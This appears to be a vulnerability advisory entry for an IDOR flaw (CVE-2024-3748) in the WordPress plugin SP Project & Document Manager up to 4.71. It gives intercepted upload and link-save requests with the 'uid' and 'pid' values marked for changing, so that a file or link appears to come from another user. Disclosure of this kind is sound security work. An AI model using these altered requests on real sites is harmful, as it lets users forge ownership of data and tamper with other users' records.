Lucene search
FewwordsWPEX-ID:01427CFB-5C51-4524-9B9D-E09A603BC34CHistoryApr 24, 2024 - 12:00 a.m.
SP Project & Document Manager <= 4.71 - Data Update via IDOR
2024-04-2400:00:00
fewwords
19
security
data update
idor
exploit
sp project
Description The plugin is missing validation in its upload function, allowing a user to manipulate the user_id to make it appear that a file was uploaded by another user
1. Select to upload a file through the plugin
2. Intercept the request:
Example:
```
------WebKitFormBoundaryX4YnPgSA4oPHlNjv
Content-Disposition: form-data; name="file[]"; filename="IMG_0628.PNG"
Content-Type: image/png
...
------WebKitFormBoundaryX4YnPgSA4oPHlNjv
Content-Disposition: form-data; name="action"
sp_file_upload_callback
------WebKitFormBoundaryX4YnPgSA4oPHlNjv
Content-Disposition: form-data; name="uid"
2(CHANGE HERE)
------WebKitFormBoundaryX4YnPgSA4oPHlNjv
```
Modify the `2(CHANGE HERE)` value and send the request.
Modify the next request body changing `2(CHANGE HERE)` to any user ID:
```
pid=2&action=sp_cdm_link_save_embed&uid=2(CHANGE HERE)&link-name=link1&link-url=http%3A%2F%2Flocalhost%3A8020%2Flink1&dlg-upload-notes=aaa
```
Note: the upload directory can also be manipulated by changing the `pid`Related
cvelist
cvelist
CVE-2024-3748 SP Project & Document Manager <= 4.71 - Data Update via IDOR
2024-05-15 06:00:04
wpvulndb
wpvulndb
SP Project & Document Manager <= 4.71 - Data Update via IDOR
2024-04-24 00:00:00
nvd
nvd
CVE-2024-3748
2024-05-15 06:15:13
vulnrichment
vulnrichment
CVE-2024-3748 SP Project & Document Manager <= 4.71 - Data Update via IDOR
2024-05-15 06:00:04
cve
cve
CVE-2024-3748
2024-05-15 06:15:13
wordfence
wordfence
6.7 Medium
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
9.2%
Related for WPEX-ID:01427CFB-5C51-4524-9B9D-E09A603BC34C